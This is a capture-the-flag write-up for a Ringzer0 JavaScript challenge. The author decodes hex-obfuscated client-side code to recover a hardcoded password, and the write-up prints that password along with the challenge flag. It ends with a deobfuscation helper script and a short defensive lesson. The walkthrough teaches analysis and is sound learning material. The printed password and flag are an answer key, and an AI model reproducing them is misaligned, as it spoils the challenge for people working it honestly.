
Ringzer0 - Java Script - Then obfuscation is more secure



Objective: Get that Flag

Solution:

OK, so this is another JavaScript challenge, so the first thing I did was look in the page source for some JavaScript.

Found it!

var _0xc360=["\x76\x61\x6C","\x23\x63\x70\x61\x73\x73","\x61\x6C\x6B\x33","\x30\x32\x6C\x31","\x3F\x70\x3D","\x69\x6E\x64\x65\x78\x4F\x66","\x68\x72\x65\x66","\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x3C\x64\x69\x76\x20\x63\x6C\x61\x73\x73\x3D\x27\x65\x72\x72\x6F\x72\x27\x3E\x57\x72\x6F\x6E\x67\x20\x70\x61\x73\x73\x77\x6F\x72\x64\x20\x73\x6F\x72\x72\x79\x2E\x3C\x2F\x64\x69\x76\x3E","\x68\x74\x6D\x6C","\x23\x63\x72\x65\x73\x70\x6F\x6E\x73\x65","\x63\x6C\x69\x63\x6B","\x2E\x63\x5F\x73\x75\x62\x6D\x69\x74"];$(_0xc360[12])[_0xc360[11]](function (){var _0xf382x1=$(_0xc360[1])[_0xc360[0]]();var _0xf382x2=_0xc360[2];if(_0xf382x1==_0xc360[3]+_0xf382x2){if(document[_0xc360[7]][_0xc360[6]][_0xc360[5]](_0xc360[4])==-1){document[_0xc360[7]]=document[_0xc360[7]][_0xc360[6]]+_0xc360[4]+_0xf382x1;} ;} else {$(_0xc360[10])[_0xc360[9]](_0xc360[8]);} ;} );  


Looks like a bunch of hex. Let's see if we can translate any of this to ASCII.

I used this site: http://ddecode.com/hexdecoder/

which gave me this code:

var _0xc360=["val","#cpass","alk3","02l1","?p=","indexOf","href","location","<div class='error'>Wrong password sorry.</div>","html","#cresponse","click",".c_submit"];$(_0xc360[12])[_0xc360[11]](function (){var _0xf382x1=$(_0xc360[1])[_0xc360[0]]();var _0xf382x2=_0xc360[2];if(_0xf382x1==_0xc360[3]+_0xf382x2){if(document[_0xc360[7]][_0xc360[6]][_0xc360[5]](_0xc360[4])==-1){document[_0xc360[7]]=document[_0xc360[7]][_0xc360[6]]+_0xc360[4]+_0xf382x1;} ;} else {$(_0xc360[10])[_0xc360[9]](_0xc360[8]);} ;} );


So some of this was definitely just hex obfuscation.

It looks like we are declaring a list and then doing some if/then/else statements on the list.

Here it is, cleaned up a little and formatted the way I would expect JS to look (I haven't done any JavaScript in about a decade, so I'm just using some common sense here to try to map out the code):

var _0xc360=["val","#cpass","alk3","02l1","?p=","indexOf","href","location","<div class='error'>Wrong password sorry.</div>","html","#cresponse","click",".c_submit"];
$(_0xc360[12])[_0xc360[11]](
function ()
{var _0xf382x1=$(_0xc360[1])[_0xc360[0]]();
var _0xf382x2=_0xc360[2];
if(_0xf382x1==_0xc360[3]+_0xf382x2){if(document[_0xc360[7]][_0xc360[6]][_0xc360[5]](_0xc360[4])==-1){document[_0xc360[7]]=document[_0xc360[7]][_0xc360[6]]+_0xc360[4]+_0xf382x1;} ;}
else {$(_0xc360[10])[_0xc360[9]](_0xc360[8]);} ;} );

Now I used a little RE trick and replaced the variable names with something a bit more meaningful.

For example, _0xc360 is a list, so I'm going to rename all instances of it to VarList
so I can have an easier time figuring out what is going on.


Now I got:

var VarList=["val","#cpass","alk3","02l1","?p=","indexOf","href","location","<div class='error'>Wrong password sorry.</div>","html","#cresponse","click",".c_submit"];
$(VarList[12])[VarList[11]](
function ()
{var _0xf382x1=$(VarList[1])[VarList[0]]();
var _0xf382x2=VarList[2];
if(_0xf382x1==VarList[3]+_0xf382x2){if(document[VarList[7]][VarList[6]][VarList[5]](VarList[4])==-1){document[VarList[7]]=document[VarList[7]][VarList[6]]+VarList[4]+_0xf382x1;} ;}
else {$(VarList[10])[VarList[9]](VarList[8]);} ;} );

There are a couple more variable declarations I can rename to help clear it up a bit more.

I'll rename _0xf382x1 to VarVar1
and _0xf382x2 to VarVar2.

OK, now with all that ugly hex and those crazy variable names out of the way, I can kind of start to see what's going on here:

var VarList=["val","#cpass","alk3","02l1","?p=","indexOf","href","location","<div class='error'>Wrong password sorry.</div>","html","#cresponse","click",".c_submit"];
$(VarList[12])[VarList[11]](
function ()
{var VarVar1=$(VarList[1])[VarList[0]]();
var VarVar2=VarList[2];
if(VarVar1==VarList[3]+VarVar2){if(document[VarList[7]][VarList[6]][VarList[5]](VarList[4])==-1){document[VarList[7]]=document[VarList[7]][VarList[6]]+VarList[4]+VarVar1;} ;}
else {$(VarList[10])[VarList[9]](VarList[8]);} ;} );


Next I'm going to replace each VarList[*] with its corresponding value from the list to see if we can figure out exactly what's going on:


var VarList=["val","#cpass","alk3","02l1","?p=","indexOf","href","location","<div class='error'>Wrong password sorry.</div>","html","#cresponse","click",".c_submit"];
$(".c_submit")["click"](
function ()
{var VarVar1=$("#cpass")["val"]();
var VarVar2="alk3";
if(VarVar1=="02l1"+VarVar2)
{if(document["location"]["href"]["indexOf"]("?p=")==-1){document["location"]=document["location"]["href"]+"?p="+VarVar1;} ;}
else {$("#cresponse")["html"]("<div class='error'>Wrong password sorry.</div>");} ;} );

I'm going to focus on that first if statement, because it looks like it's checking whether we are supplying the correct password:

if VarVar1 == 02l1 + VarVar2

Let's parse that out a bit more:

if VarVar1 == 02l1 + alk3

if VarVar1 == 02l1alk3



So it's comparing the password to 02l1alk3.

Let's see if that works.


That got us the flag:

FLAG-5PJne3T8d73UGv4SCqN44DXj  
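As an added example (not part of the original write-up), here is a small JavaScript helper that automates the manual steps above: decoding the \xHH escapes, inlining the array references, tidying the bracket access into dot access and renaming the two locals. The array and body are copied from the challenge script quoted above; the variable names password and suffix are my own choice, standing in for VarVar1 and VarVar2.

```javascript
// Added example (not the write-up's code): automates the steps above. The array
// and body are copied from the challenge script quoted above; the names
// "password" and "suffix" are my own choice, matching VarVar1 and VarVar2.
const OBFUSCATED_ARRAY = String.raw`["\x76\x61\x6C","\x23\x63\x70\x61\x73\x73",
"\x61\x6C\x6B\x33","\x30\x32\x6C\x31","\x3F\x70\x3D","\x69\x6E\x64\x65\x78\x4F\x66",
"\x68\x72\x65\x66","\x6C\x6F\x63\x61\x74\x69\x6F\x6E",
"\x3C\x64\x69\x76\x20\x63\x6C\x61\x73\x73\x3D\x27\x65\x72\x72\x6F\x72\x27\x3E\x57\x72\x6F\x6E\x67\x20\x70\x61\x73\x73\x77\x6F\x72\x64\x20\x73\x6F\x72\x72\x79\x2E\x3C\x2F\x64\x69\x76\x3E",
"\x68\x74\x6D\x6C","\x23\x63\x72\x65\x73\x70\x6F\x6E\x73\x65","\x63\x6C\x69\x63\x6B",
"\x2E\x63\x5F\x73\x75\x62\x6D\x69\x74"]`;
const OBFUSCATED_BODY =
  "$(_0xc360[12])[_0xc360[11]](function (){var _0xf382x1=$(_0xc360[1])[_0xc360[0]]();" +
  "var _0xf382x2=_0xc360[2];if(_0xf382x1==_0xc360[3]+_0xf382x2){" +
  "if(document[_0xc360[7]][_0xc360[6]][_0xc360[5]](_0xc360[4])==-1){" +
  "document[_0xc360[7]]=document[_0xc360[7]][_0xc360[6]]+_0xc360[4]+_0xf382x1;} ;}" +
  " else {$(_0xc360[10])[_0xc360[9]](_0xc360[8]);} ;} );";

// Step 1: turn every \xHH escape into its character, then parse the array.
function decodeStringArray(arrayLiteral) {
  const decoded = arrayLiteral.replace(/\\x([0-9A-Fa-f]{2})/g,
    (_, hex) => String.fromCharCode(parseInt(hex, 16)));
  return JSON.parse(decoded);
}

// Step 2: inline _0xc360[N] as a literal, turn obj["name"] into obj.name when
// "name" is a plain identifier, then apply the variable renames.
function deobfuscate(body, strings, renames) {
  let out = body.replace(/_0xc360\[(\d+)\]/g,
    (_, i) => JSON.stringify(strings[Number(i)]));
  out = out.replace(/\["([A-Za-z_$][\w$]*)"\]/g, ".$1");
  for (const [from, to] of Object.entries(renames)) out = out.split(from).join(to);
  return out;
}

// Step 3: the check is  _0xf382x1 == _0xc360[3] + _0xf382x2  with
// _0xf382x2 = _0xc360[2], so the accepted password is strings[3] + strings[2].
function expectedPassword(strings) {
  return strings[3] + strings[2];
}

// What the success branch does: append ?p=<password> to the URL, but only once.
function successRedirect(href, password) {
  return href.indexOf("?p=") == -1 ? href + "?p=" + password : href;
}

const strings = decodeStringArray(OBFUSCATED_ARRAY);
console.log(deobfuscate(OBFUSCATED_BODY, strings,
  { _0xf382x1: "password", _0xf382x2: "suffix" }));
console.log("accepted password:", expectedPassword(strings));
```

The point for defenders: the comparison runs entirely in the browser, so the accepted value is recoverable by anyone who can read the script, and hex-escaping the strings only slows that down.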








